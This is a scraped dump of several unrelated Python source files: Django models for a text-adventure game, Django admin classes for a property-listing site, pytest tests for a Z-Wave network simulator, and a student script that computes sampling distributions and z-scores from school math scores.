    # 7 chars, presumably a "YYYY-MM" month string -- TODO confirm with callers
    featured_month = models.CharField(null=True, blank=True, max_length=7)
    tags = TaggableManager(blank=True)
    authors = models.ManyToManyField(Author)

    def __str__(self):
        return self.name

    @property
    def times_played(self):
        """Count of 'start adventure' activity-log entries for this adventure."""
        return ActivityLog.objects.filter(type='start adventure', adventure_id=self.id).count()

    @property
    def avg_ratings(self):
        """Average overall/combat/puzzle ratings as a dict of '<field>__avg' keys."""
        return self.ratings.all().aggregate(models.Avg('overall'), models.Avg('combat'), models.Avg('puzzle'))

    @property
    def rooms_count(self):
        """Number of rooms defined for this adventure."""
        return Room.objects.filter(adventure_id=self.id).count()

    @property
    def artifacts_count(self):
        """Number of artifacts defined for this adventure."""
        return Artifact.objects.filter(adventure_id=self.id).count()

    @property
    def effects_count(self):
        """Number of effects defined for this adventure."""
        return Effect.objects.filter(adventure_id=self.id).count()

    @property
    def monsters_count(self):
        """Number of monsters defined for this adventure."""
        return Monster.objects.filter(adventure_id=self.id).count()

    class Meta:
        ordering = ['name']
class Room(models.Model):
    """A single location in an adventure's map, including darkness handling."""
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='rooms')
    room_id = models.IntegerField(default=0) # The in-game room ID.
    name = models.CharField(max_length=255)
    is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
    description = models.TextField(max_length=1000)
    # The ID of an effect to display after the description
    effect = models.IntegerField(null=True, blank=True)
    # The ID of an effect to display after the description, without a paragraph break.
    effect_inline = models.IntegerField(null=True, blank=True)
    # If True, the player needs a light source to see the normal name/description.
    is_dark = models.BooleanField(default=False)
    dark_name = models.CharField(null=True, blank=True, max_length=255,
                                 help_text="The name shown if the room is dark and the player doesn't have a light. "
                                           "Leave blank to use the standard 'in the dark' message.")
    dark_description = models.TextField(
        null=True, blank=True, max_length=1000,
        help_text="The description shown if the room is dark and the player doesn't"
                  " have a light. Leave blank to use the standard 'it's too dark to see' message.")
    data = models.TextField(
        max_length=1000, null=True, blank=True,
        help_text="Adventure-specific data for this room, e.g., room type or environment "
                  "(road, cave, snow, etc.). Data can be used in custom code. Enter as a "
                  "JSON object."
    )
    def __str__(self):
        """Display the room name."""
        return self.name
class RoomExit(models.Model):
    """
    A one-way connection out of a room in a given direction, optionally
    blocked by a door artifact or annotated with an effect message.
    """
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='room_exits', null=True)
    direction = models.CharField(max_length=2)  # direction code, max 2 chars (e.g., compass abbreviations)
    room_from = models.ForeignKey(Room, on_delete=models.CASCADE, related_name='exits')
    room_to = models.IntegerField(default=0) # Not a real foreign key. Yet.
    # presumably the artifact ID of a door/gate on this exit -- TODO confirm
    door_id = models.IntegerField(null=True, blank=True)
    effect_id = models.IntegerField(null=True, blank=True,
                                    help_text="The effect will be shown when the player moves in this direction. "
                                              "You can also enter a zero for the connection and an effect ID to set up "
                                              "a custom message on a non-existent exit, e.g., if the player can't go in"
                                              " the ocean without a boat, etc.")

    def __str__(self):
        return str(self.room_from) + " " + self.direction

    def save(self, *args, **kwargs):
        """Keep the denormalized adventure FK in sync with the source room.

        Fixed signature: the original ``save(self, **kwargs)`` raised
        TypeError when called with Django's standard positional arguments
        (e.g. ``save(force_insert)``); ``*args`` is now passed through.
        """
        if self.room_from and self.adventure_id != self.room_from.adventure_id:
            self.adventure_id = self.room_from.adventure_id
        super().save(*args, **kwargs)
class Artifact(models.Model):
    """
    An item within an adventure: weapons, treasure, containers, doors,
    light sources, wearables, readables, bound/disguised monsters, etc.
    The ``type`` field (see ARTIFACT_TYPES) determines which of the other
    fields are meaningful.
    """
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='artifacts')
    artifact_id = models.IntegerField(default=0) # The in-game artifact ID.
    article = models.CharField(max_length=20, null=True, blank=True,
                               help_text="Optional article or adjective that appears before the name, "
                                         "e.g., 'a', 'the', 'some'.")
    name = models.CharField(max_length=255)
    synonyms = models.CharField(
        null=True, max_length=255, blank=True,
        help_text="Other terms for this artifact. E.g., if the artifact name is 'secret door in"
                  " north wall' you could have a synonym of 'door' to help the player find it.")
    is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
    description = models.TextField(max_length=1000)
    # The ID of an effect to display after the description
    effect = models.IntegerField(null=True, blank=True)
    # The ID of an effect to display after the description, without a paragraph break.
    effect_inline = models.IntegerField(null=True, blank=True)
    # Starting location: at most one of room_id / monster_id / container_id
    # is expected to be set -- TODO confirm this invariant with the game engine.
    room_id = models.IntegerField(
        null=True, blank=True,
        help_text="If in a room, the room ID"
    )
    monster_id = models.IntegerField(
        null=True, blank=True,
        help_text="If carried by a monster, the monster ID"
    )
    container_id = models.IntegerField(
        null=True, blank=True,
        help_text="If in a container, the container ID"
    )
    guard_id = models.IntegerField(
        null=True, blank=True,
        help_text="If a bound monster, the ID of a monster that prevents the player from freeing it. For other "
                  "artifact types, the ID of a monster that prevents the player from picking it up."
    )
    weight = models.IntegerField(
        default=0,
        help_text="Weight in Gronds. Enter -999 for something that can't be picked up, or 999 to show the message "
                  "'Don't be absurd' if the player tries to pick it up."
    )
    value = models.IntegerField(default=0)
    type = models.IntegerField(null=True, choices=ARTIFACT_TYPES)
    is_worn = models.BooleanField(default=False)
    is_open = models.BooleanField(default=False)
    key_id = models.IntegerField(
        null=True, blank=True,
        help_text="If a container, door, or bound monster, the artifact ID of the key that opens it"
    )
    linked_door_id = models.IntegerField(
        null=True, blank=True,
        help_text="To make a two-sided door, enter the artifact ID of the other side of the door. "
                  "They will open and close as a set."
    )
    hardiness = models.IntegerField(
        null=True, blank=True,
        help_text="If a door or container that can be smashed open, how much damage does it take to open it?")
    # Weapon fields (types 2 and 3 only)
    weapon_type = models.IntegerField(null=True, blank=True, choices=WEAPON_TYPES)
    hands = models.IntegerField(default=1, choices=(
        (1, 'One-handed'),
        (2, 'Two-handed')
    ))
    weapon_odds = models.IntegerField(null=True, blank=True)
    dice = models.IntegerField(null=True, blank=True)
    sides = models.IntegerField(null=True, blank=True)
    clothing_type = models.IntegerField(null=True, choices=CLOTHING_TYPES, help_text="Reserved for future use.")
    armor_class = models.IntegerField(
        null=True, default=0,
        help_text="(Armor only) How many hits does this armor protect against?"
    )
    armor_type = models.IntegerField(null=True, blank=True, choices=ARMOR_TYPES)
    armor_penalty = models.IntegerField(
        default=0, null=True,
        help_text="(Armor only) How much does this reduce the player's chance to hit, if they don't have enough "
                  "armor expertise?"
    )
    get_all = models.BooleanField(
        default=True,
        help_text="Will the 'get all' command pick up this item?"
    )
    embedded = models.BooleanField(
        default=False,
        help_text="Check this box to make the item not appear in the artifacts list until the player looks at it.")
    hidden = models.BooleanField(
        default=False,
        help_text="(For secret doors only) Check this box for embedded secret doors, so that the player can't "
                  "pass through them before finding them.")
    quantity = models.IntegerField(
        null=True, blank=True,
        help_text="Drinks or bites, fuel for light source, etc."
    )
    effect_id = models.IntegerField(
        null=True, blank=True,
        help_text="First effect ID for Readable artifacts"
    )
    num_effects = models.IntegerField(
        null=True, blank=True,
        help_text="Number of effects for Readable artifacts"
    )
    data = models.TextField(
        max_length=1000, null=True, blank=True,
        help_text="Adventure-specific data for this artifact, e.g., elemental weapon, etc."
                  "Enter as a JSON object."
    )
    def __str__(self):
        """Display the artifact name."""
        return self.name
class ArtifactMarking(models.Model):
    """
    Markings on a readable artifact
    """
    artifact = models.ForeignKey(Artifact, on_delete=models.CASCADE)
    # One chunk of text written on the artifact.
    marking = models.TextField(max_length=65535)
class Effect(models.Model):
    """
    A block of text the game can display (room/artifact extras, chained
    messages, etc.), optionally rendered with a display style/color.
    """
    STYLES = (
        ('', 'Normal'),
        ('emphasis', 'Bold'),
        ('success', 'Success (green)'),
        ('special', 'Special 1 (blue)'),
        # Label fixed: previously read "Special 1 (purple)", duplicating the
        # label of the 'special' style above.
        ('special2', 'Special 2 (purple)'),
        ('warning', 'Warning (orange)'),
        ('danger', 'Danger (red)'),
    )
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='effects')
    effect_id = models.IntegerField(default=0) # The in-game effect ID.
    is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
    text = models.TextField(max_length=65535)
    style = models.CharField(max_length=20, null=True, blank=True, choices=STYLES) # display effect text in color
    next = models.IntegerField(null=True, blank=True,
                               help_text="The next chained effect. Used with EDX conversions.")
    next_inline = models.IntegerField(null=True, blank=True,
                                      help_text="The next chained effect, no line break. Used with EDX conversions.")

    def __str__(self):
        """Display the first 50 characters of the effect text."""
        return self.text[0:50]
class Monster(models.Model):
    """
    A monster or NPC in an adventure, including its combat stats, disposition
    toward the player, starting location, and weapon configuration.
    """
    # Disposition toward the player; 'random' uses friend_odds each game.
    FRIENDLINESS = (
        ('friend', 'Always Friendly'),
        ('neutral', 'Always Neutral'),
        ('hostile', 'Always Hostile'),
        ('random', 'Random'),
    )
    COMBAT_CODES = (
        (1, "Attacks using generic ATTACK message (e.g., slime, snake, bird)"),
        (0, "Uses weapon, or with natural weapons if specified (default)"),
        (-1, "Use weapon if it has one, otherwise natural weapons"),
        (-2, "Never fights"),
    )
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='monsters')
    monster_id = models.IntegerField(default=0) # The in-game monster ID.
    article = models.CharField(max_length=20, null=True, blank=True,
                               help_text="Optional article or adjective that appears before the name, "
                                         "e.g., 'a', 'the', 'some'. Does not apply to group monsters.")
    name = models.CharField(max_length=255)
    name_plural = models.CharField(
        max_length=255, null=True, blank=True,
        help_text="The plural form of the name. Used only with group monsters.")
    synonyms = models.CharField(
        null=True, max_length=255, blank=True,
        help_text="Other names used for this monster. If the name is 'python' a synonym might be 'snake'")
    is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
    description = models.TextField(max_length=1000)
    # The ID of an effect to display after the description
    effect = models.IntegerField(null=True, help_text="Used only with EDX conversions")
    # The ID of an effect to display after the description, without a paragraph break.
    effect_inline = models.IntegerField(null=True, help_text="Used only with EDX conversions")
    # Number of individuals; > 1 makes this a group monster.
    count = models.IntegerField(default=1)
    hardiness = models.IntegerField(default=12)
    agility = models.IntegerField(default=12)
    friendliness = models.CharField(max_length=10, choices=FRIENDLINESS)
    friend_odds = models.IntegerField(default=50,
                                      help_text="Used only when 'Friendliness' is 'Random'"
                                      )
    combat_code = models.IntegerField(default=0, choices=COMBAT_CODES)
    courage = models.IntegerField(default=100)
    pursues = models.BooleanField(default=True, help_text="Will the monster pursue a fleeing player?")
    room_id = models.IntegerField(null=True, blank=True)
    container_id = models.IntegerField(
        null=True, blank=True,
        help_text="Container artifact ID where this monster starts. The monster will enter the room as soon as the "
                  "container is opened. e.g., a vampire who awakes when you open his coffin"
    )
    gender = models.CharField(max_length=6, choices=(
        ('male', 'Male'),
        ('female', 'Female'),
        ('none', 'None'),
    ), null=True, blank=True)
    weapon_id = models.IntegerField(
        null=True, blank=True,
        help_text="Enter an artifact ID, or zero for natural weapons. Leave blank for no weapon.")
    attack_odds = models.IntegerField(
        default=50,
        help_text="Base attack odds, before agility and armor adjustments. Weapon type does not matter.")
    weapon_dice = models.IntegerField(
        default=1,
        help_text="Applies to natural weapons only. For an artifact weapon, the weapon's dice and sides will be used.")
    weapon_sides = models.IntegerField(default=4,
                                       help_text="Applies to natural weapons only.")
    defense_bonus = models.IntegerField(
        default=0,
        help_text="Gives the monster an additional percent bonus to avoid being hit. (Rare)"
    )
    armor_class = models.IntegerField(default=0)
    special = models.CharField(max_length=255, null=True, blank=True)
    data = models.TextField(
        max_length=1000, null=True, blank=True,
        help_text="Adventure-specific data for this monster, e.g., type of monster like "
                  "vampire, undead, soldier, frost, etc. Data can be used in custom code. "
                  "Enter as a JSON object."
    )
    combat_verbs = models.CharField(
        max_length=255, null=True, blank=True,
        help_text="Custom combat verbs for this monster, e.g., 'stings' or 'breathes fire at'. "
                  "Leave blank to use the standard verbs.")
    def __str__(self):
        """Display the monster name."""
        return self.name
class Hint(models.Model):
    """
    Represents a hint for the adventure hints system
    """
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='hints', null=True)
    # Sort/sequence index within the adventure's hints -- TODO confirm usage
    index = models.IntegerField(null=True)
    # Presumably a legacy EDX identifier (cf. Adventure.edx) -- TODO confirm
    edx = models.CharField(max_length=50, null=True, blank=True)
    question = models.CharField(max_length=255)
    def __str__(self):
        """Display the hint question."""
        return self.question
class HintAnswer(models.Model):
    """
    Represents an answer to a hint. Each hint may have more than one answer.
    """
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='hint_answers', null=True)
    hint = models.ForeignKey(Hint, on_delete=models.CASCADE, related_name='answers')
    # Sort/sequence index among the hint's answers -- TODO confirm usage
    index = models.IntegerField(null=True)
    answer = models.TextField(max_length=1000, help_text="Supports Markdown.")
    spoiler = models.BooleanField(default=False,
                                  help_text="Obscure the answer until the user shows it.")

    def save(self, *args, **kwargs):
        """Keep the denormalized adventure FK in sync with the parent hint.

        Fixed signature: the original ``save(self, **kwargs)`` raised
        TypeError when called with Django's standard positional arguments;
        ``*args`` is now passed through (matches the RoomExit.save fix).
        """
        if self.hint and self.adventure_id != self.hint.adventure_id:
            self.adventure_id = self.hint.adventure_id
        super().save(*args, **kwargs)
class PlayerProfile(models.Model):
    """Associates an external identity with a player-data UUID."""
    # Presumably an ID from a social login provider -- TODO confirm provider/format
    social_id = models.CharField(max_length=100, null=True)
    # UUID matching Player.uuid -- TODO confirm this link in the views layer
    uuid = models.CharField(max_length=255, null=True)
class Player(models.Model):
    """
    Represents the player saved in the main hall.
    """
    name = models.CharField(max_length=255)
    gender = models.CharField(max_length=6, choices=(
        ('m', 'Male'),
        ('f', 'Female')
    ))
    # Core attributes
    hardiness = models.IntegerField(default=12)
    agility = models.IntegerField(default=12)
    charisma = models.IntegerField(default=12)
    gold = models.IntegerField(default=200)
    gold_in_bank = models.IntegerField(default=0)
    # Weapon abilities (integer modifiers; units TODO — confirm whether
    # these are percent to-hit bonuses)
    wpn_axe = models.IntegerField("Axe ability", default=5)
    wpn_bow = models.IntegerField("Bow/missile ability", default=-10)
    wpn_club = models.IntegerField("Club ability", default=20)
    wpn_spear = models.IntegerField("Spear/Polearm ability", default=10)
    wpn_sword = models.IntegerField("Sword ability", default=0)
    armor_expertise = models.IntegerField(default=0)
    # Spell abilities
    spl_blast = models.IntegerField("Blast ability", default=0)
    spl_heal = models.IntegerField("Heal ability", default=0)
    spl_power = models.IntegerField("Power ability", default=0)
    spl_speed = models.IntegerField("Speed ability", default=0)
    uuid = models.CharField(max_length=255, null=True)

    def __str__(self):
        return self.name

    def log(self, type, adventure_id=None):
        """Record an ActivityLog entry of the given type for this player.

        The parameter deliberately keeps the name ``type`` (shadowing the
        builtin) because keyword callers and the ActivityLog field share it.
        Local renamed from the ambiguous single letter ``l`` (PEP 8 E741).
        """
        entry = ActivityLog(player=self, type=type, adventure_id=adventure_id)
        entry.save()
class PlayerArtifact(models.Model):
    """
    The items (weapons, armor, shield) in the player's inventory in the main hall
    """
    # Item categories; the numeric codes are stored in the DB — do not renumber.
    TYPES = (
        (2, 'Weapon'),
        (3, 'Magic Weapon'),
        (11, 'Wearable'),  # armor/shield
    )
    ARMOR_TYPES = (
        (0, 'Armor'),
        (1, 'Shield'),  # different in EDX - see manual
        (2, 'Helmet'),
        (3, 'Gloves'),
        (4, 'Ring'),
    )
    HANDS = (
        (1, 'One-handed'),
        (2, 'Two-handed')
    )
    player = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='inventory')
    name = models.CharField(max_length=255)
    description = models.TextField(max_length=1000)
    type = models.IntegerField(choices=TYPES)
    weight = models.IntegerField(default=0)
    value = models.IntegerField(default=0)
    # WEAPON_TYPES is a module-level constant defined outside this excerpt.
    weapon_type = models.IntegerField(default=0, choices=WEAPON_TYPES, null=True)
    hands = models.IntegerField(choices=HANDS, default=1)
    weapon_odds = models.IntegerField(default=0, null=True)
    # Damage roll: `dice` x d`sides`
    dice = models.IntegerField(default=1, null=True)
    sides = models.IntegerField(default=1, null=True)
    armor_type = models.IntegerField(default=0, choices=ARMOR_TYPES, null=True)
    armor_class = models.IntegerField(default=0, null=True)
    armor_penalty = models.IntegerField(default=0, null=True)

    def __str__(self):
        return "{} {}".format(self.player, self.name)
class ActivityLog(models.Model):
    """
    Used to track player activity (going on adventures, etc.)
    """
    player = models.ForeignKey(Player, null=True, blank=True, on_delete=models.CASCADE, related_name='activity_log')
    # Free-form event-type string; values are supplied by Player.log() callers.
    type = models.CharField(max_length=255)
    # Optional numeric payload for the event.
    value = models.IntegerField(null=True, blank=True)
    adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='activity_log', null=True)
    created = models.DateTimeField(auto_now_add=True, null=True)
| [
"keith.dechant@gmail.com"
] | keith.dechant@gmail.com |
0296c3ac5062c3f2f6eea64673506c87b8776d09 | a1481440fea0f9ff44cab2c5248b6a71bcbe286c | /frontend/admin.py | a1a59501a53ad6ebdf5b6fb99596e53bda005a13 | [] | no_license | arm923i/utlandia2 | 13457cc54647122ea386efbdf865e141827b2063 | 391062e822c478ce9406922eb1a1a7518e224cd6 | refs/heads/master | 2023-08-18T16:58:30.480815 | 2021-10-18T12:58:47 | 2021-10-18T12:58:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,672 | py | from django.contrib import admin
from modeltranslation.admin import TranslationAdmin, TabbedTranslationAdmin, TranslationTabularInline
from seo.admin import ModelInstanceSeoInline
from .models import Lead, FlatsList, Floor, Dev_category, Dev_history, Documents, Gallery_docs, \
Section, WidgetBlock, ImageBlock, HeaderBlock
# class CategoryAdmin(admin.ModelAdmin):
# list_display = ('title',)
# prepopulated_fields = {'slug': ('title',)}
@admin.register(FlatsList)
class FlatsAdmin(admin.ModelAdmin):
    # Flat listings: searchable by status/number, filterable by layout facets,
    # ordered the way flats are browsed (building, floor, layout type).
    list_display = ('number', 'property_type', 'price_m2', 'price', 'floor',
                    'type', 'square_total', 'rooms', 'img_url', 'status', 'section')
    prepopulated_fields = {'slug': ('type',)}
    list_filter = ('status', 'rooms', 'floor', 'property_type', 'section')
    search_fields = ('status', 'number')
    ordering = ('property_type', 'floor', 'type')
@admin.register(Dev_history)
class Dev_historyAdmin(admin.ModelAdmin):
    # Development-history entries, newest first.
    list_display = ('category', 'title', 'created_at', 'video_url')
    list_filter = ('category', 'created_at')
    search_fields = ('category', 'created_at')
    ordering = ('-created_at',)
@admin.register(Dev_category)
class Dev_categoryAdmin(admin.ModelAdmin):
    # Development-history categories; slug auto-filled from the title.
    prepopulated_fields = {'slug': ('title',)}
    list_display = ('title', 'percent')
@admin.register(Lead)
class LeadAdmin(admin.ModelAdmin):
    # Sales leads captured from the site's contact forms.
    list_display = ('lead_name', 'phone_number')
@admin.register(Floor)
class FloorAdmin(admin.ModelAdmin):
    # Building floors; slug auto-filled from the floor number.
    prepopulated_fields = {'slug': ('number',)}
    list_display = ('number',)
# class SnippetAdmin(admin.ModelAdmin):
# list_display = ('title', 'slug', 'body')
class GalleryDocumentsInline(admin.TabularInline):
    # Inline editor for gallery images attached to a document.
    fk_name = 'document'
    model = Gallery_docs
    extra = 1
# class GalleryBlocksInline(admin.StackedInline):
# fk_name = 'block'
# model = Gallery_blocks
# extra = 1
#
#
# class Big_textInline(TranslationTabularInline):
# fk_name = 'block'
# model = Big_text
# extra = 1
#
#
# class Small_textInline(TranslationTabularInline):
# fk_name = 'block'
# model = Small_text
# extra = 1
@admin.register(Documents)
class DocumentsAdmin(TranslationAdmin):
    # Translated document pages with inline gallery images.
    inlines = [GalleryDocumentsInline, ]
    prepopulated_fields = {'slug': ('title',)}

    class Media:
        # Assets required by django-modeltranslation's tabbed field widget.
        js = (
            'https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js',
            'https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js',
            'modeltranslation/js/tabbed_translation_fields.js',
        )
        css = {
            'screen': ('modeltranslation/css/tabbed_translation_fields.css',),
        }
class ImageBlockInline(admin.StackedInline):
    # Inline editor for image blocks belonging to a section block.
    fk_name = 'block'
    model = ImageBlock
    extra = 0
class HeaderBlockInline(TranslationTabularInline):
    # Inline editor for translated header blocks belonging to a section block.
    fk_name = 'block'
    model = HeaderBlock
    extra = 0
class WidgetBlockInline(TranslationTabularInline):
    # Inline editor for translated widget blocks belonging to a section block.
    fk_name = 'block'
    model = WidgetBlock
    extra = 0
@admin.register(Section)
class SectionAdmin(admin.ModelAdmin):
    # Page sections edited together with their image/header/widget blocks.
    # NOTE(review): `group_fieldsets` is a django-modeltranslation
    # TranslationAdmin option; on a plain ModelAdmin it has no effect —
    # confirm whether this class was meant to extend TranslationAdmin.
    group_fieldsets = True
    inlines = [ImageBlockInline, HeaderBlockInline, WidgetBlockInline, ]

    class Media:
        # Assets required by django-modeltranslation's tabbed field widget.
        js = (
            'https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js',
            'https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js',
            'modeltranslation/js/tabbed_translation_fields.js',
        )
        css = {
            'screen': ('modeltranslation/css/tabbed_translation_fields.css',),
        }
| [
"dev.arm923i@gmail.com"
] | dev.arm923i@gmail.com |
d4859c95121f3dbbb2a8a2154051082451b1d5fa | a71ba086a02ae863a4f8e6cfdc2c6fb5f4910446 | /network/core/tests/test_client_command_handler.py | e2d769f7f01a0ee989707865673ca55f2d41abdc | [] | no_license | roman-vorobiov/virtual-zwave | 03f187d79f678ad48170d2bc6fe1c333621c125d | b8b74ab6f7740777b5e5f0979ca2d2c3ca8455ba | refs/heads/master | 2023-04-10T22:59:12.785974 | 2021-04-30T15:04:09 | 2021-04-30T15:09:26 | 363,171,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,673 | py | from .fixtures import *
from network.core.command_handler import CommandHandler
import humps
import json
import pytest
@pytest.fixture
def command_handler(client, node_manager):
    # Handler under test, wired to the fake client and node manager fixtures.
    yield CommandHandler(client, node_manager)
@pytest.fixture
def rx_client(command_handler):
    """Fixture returning a helper that simulates a client command arriving."""
    def inner(message_type: str, message: dict):
        # The handler consumes the JSON-serialized envelope, exactly as the
        # real client would send it.
        envelope = {
            'messageType': message_type,
            'message': message
        }
        command_handler.handle_command(json.dumps(envelope))

    yield inner
def test_get_nodes(rx_client, tx_client, included_node):
    # A GET_NODES request is answered with a NODES_LIST of every known node.
    rx_client('GET_NODES', {})

    tx_client('NODES_LIST', {
        'nodes': [included_node.to_json()]
    })
def test_create_node(rx_client, tx_client, tx_controller, nodes, node_info):
    # Creating a node from a node-info payload stores it and notifies clients.
    assert len(nodes.all()) == 0

    rx_client('CREATE_NODE', {
        'node': node_info
    })
    tx_client('NODE_ADDED', {
        'node': nodes.all()[0].to_json()
    })

    assert len(nodes.all()) == 1
def test_remove_node(rx_client, tx_client, tx_controller, nodes, node):
    # Removing an existing node deletes it and broadcasts the removed id.
    assert len(nodes.all()) == 1

    rx_client('REMOVE_NODE', {
        'nodeId': node.id
    })
    tx_client('NODE_REMOVED', {
        'nodeId': node.id
    })

    assert len(nodes.all()) == 0
def test_reset(rx_client, tx_client, tx_controller, nodes, node):
    # Resetting the network drops every node and broadcasts an empty list.
    assert len(nodes.all()) == 1

    rx_client('RESET_NETWORK', {})
    tx_client('NODES_LIST', {
        'nodes': []
    })

    assert len(nodes.all()) == 0
def test_send_nif(rx_client, tx_client, tx_controller, node):
    # SEND_NIF makes the node broadcast its node information frame
    # to the controller.
    rx_client('SEND_NIF', {
        'nodeId': node.id
    })
    tx_controller('APPLICATION_NODE_INFORMATION', {
        'source': {'homeId': node.home_id, 'nodeId': node.node_id},
        'nodeInfo': node.get_node_info().to_json()
    })
def test_update_node(rx_client, tx_client, tx_controller, node):
    # Updating a command class state (0x25 = Z-Wave Binary Switch) changes
    # the stored value and notifies clients with the serialized class.
    command_class = node.root_channel.get_command_class(0x25)
    assert command_class.value is False

    rx_client('UPDATE_COMMAND_CLASS', {
        'nodeId': node.id,
        'channelId': node.root_channel.endpoint,
        'classId': 0x25,
        'state': {
            'value': True
        }
    })
    tx_client('COMMAND_CLASS_UPDATED', {
        'nodeId': node.id,
        'channelId': 0,
        'commandClass': humps.camelize(node.get_channel(0).command_classes[0x25].to_dict())
    })

    assert command_class.value is True
def test_reset_node(rx_client, tx_client, tx_controller, node):
    # Resetting a node restores command-class defaults and notifies clients
    # with the node's fresh state.
    command_class = node.root_channel.get_command_class(0x25)
    command_class.value = True

    rx_client('RESET_NODE', {
        'nodeId': node.id
    })
    tx_client('NODE_RESET', {
        'node': node.to_json()
    })

    assert command_class.value is False
| [
"roman.vorobyov7777@gmail.com"
] | roman.vorobyov7777@gmail.com |
531f170b486d939d4b48fe551c44c13a071de08e | ad19e4f69657bce1c2ad744bc013562a7aeb77e1 | /z-score.py | 2ac3dd0188b010b682ad890c813d91698e94c9c9 | [] | no_license | MEENAGARAI/c111 | 9d7bd9893379cad4b53758bba33854451519e84e | d9ff8025ca1cffeced8114a47344ae593baa3592 | refs/heads/main | 2023-03-03T22:36:43.292830 | 2021-02-17T14:02:30 | 2021-02-17T14:02:30 | 331,334,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,735 | py | import plotly.figure_factory as ff
import plotly.graph_objects as go
import statistics
import random
import pandas as pd
import csv
#Change the School data here
df = pd.read_csv("School2.csv")
data = df["Math_score"].tolist()
## code to find the mean of 100 data points 1000 times
#function to get the mean of the given data samples
# pass the number of data points you want as counter
def random_set_of_mean(counter):
dataset = []
for i in range(0, counter):
random_index= random.randint(0,len(data)-1)
value = data[random_index]
dataset.append(value)
mean = statistics.mean(dataset)
return mean
# Function to get the mean of 100 data sets
mean_list = []
for i in range(0,1000):
set_of_means= random_set_of_mean(100)
mean_list.append(set_of_means)
## calculating mean and standard_deviation of the sampling distribution.
std_deviation = statistics.stdev(mean_list)
mean = statistics.mean(mean_list)
print("mean of sampling distribution:- ",mean)
print("Standard deviation of sampling distribution:- ", std_deviation)
## findig the standard deviation starting and ending values
first_std_deviation_start, first_std_deviation_end = mean-std_deviation, mean+std_deviation
second_std_deviation_start, second_std_deviation_end = mean-(2*std_deviation), mean+(2*std_deviation)
third_std_deviation_start, third_std_deviation_end = mean-(3*std_deviation), mean+(3*std_deviation)
# print("std1",first_std_deviation_start, first_std_deviation_end)
# print("std2",second_std_deviation_start, second_std_deviation_end)
# print("std3",third_std_deviation_start,third_std_deviation_end)
# # finding the mean of THE STUDENTS WHO GAVE EXTRA TIME TO MATH LAB and plotting on graph
df = pd.read_csv("School_1_Sample.csv")
data = df["Math_score"].tolist()
mean_of_sample1 = statistics.mean(data)
print("Mean of sample 1:- ",mean_of_sample1)
fig = ff.create_distplot([mean_list], ["student marks"], show_hist=False)
fig.add_trace(go.Scatter(x=[mean, mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[mean_of_sample1, mean_of_sample1], y=[0, 0.17], mode="lines", name="MEAN OF STUDENTS WHO HAD MATH LABS"))
fig.add_trace(go.Scatter(x=[first_std_deviation_end, first_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1 END"))
fig.add_trace(go.Scatter(x=[second_std_deviation_end, second_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2 END"))
fig.add_trace(go.Scatter(x=[third_std_deviation_end, third_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3 END"))
fig.show()
# #finding the mean of the STUDENTS WHO USED MATH PRACTISE APP and plotting it on the plot.
df = pd.read_csv("School_2_Sample.csv")
data = df["Math_score"].tolist()
mean_of_sample2 = statistics.mean(data)
print("mean of sample 2:- ",mean_of_sample2)
fig = ff.create_distplot([mean_list], ["student marks"], show_hist=False)
fig.add_trace(go.Scatter(x=[mean, mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[mean_of_sample2, mean_of_sample2], y=[0, 0.17], mode="lines", name="MEAN OF STUDENTS WHO USED THE APP"))
fig.add_trace(go.Scatter(x=[first_std_deviation_end, first_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1 END"))
fig.add_trace(go.Scatter(x=[second_std_deviation_end, second_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2 END"))
fig.add_trace(go.Scatter(x=[third_std_deviation_end, third_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3 END"))
fig.show()
# finding the mean of the STUDENTS WHO WERE ENFORCED WITH REGISTERS and plotting it on the plot.
df = pd.read_csv("School_3_Sample.csv")
data = df["Math_score"].tolist()
mean_of_sample3 = statistics.mean(data)
print("mean of sample 3:- ",mean_of_sample3)
fig = ff.create_distplot([mean_list], ["student marks"], show_hist=False)
fig.add_trace(go.Scatter(x=[mean, mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[mean_of_sample3, mean_of_sample3], y=[0, 0.17], mode="lines", name="MEAN OF STUDNETS WHO WERE ENFORCED WITH MATH REGISTERS"))
fig.add_trace(go.Scatter(x=[second_std_deviation_end, second_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2 END"))
fig.add_trace(go.Scatter(x=[third_std_deviation_end, third_std_deviation_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3 END"))
fig.show()
#finding the z score using the formula
z_score = (mean_of_sample1-mean)/std_deviation
print("The z score is = ",z_score)
z_score = (mean_of_sample2-mean)/std_deviation
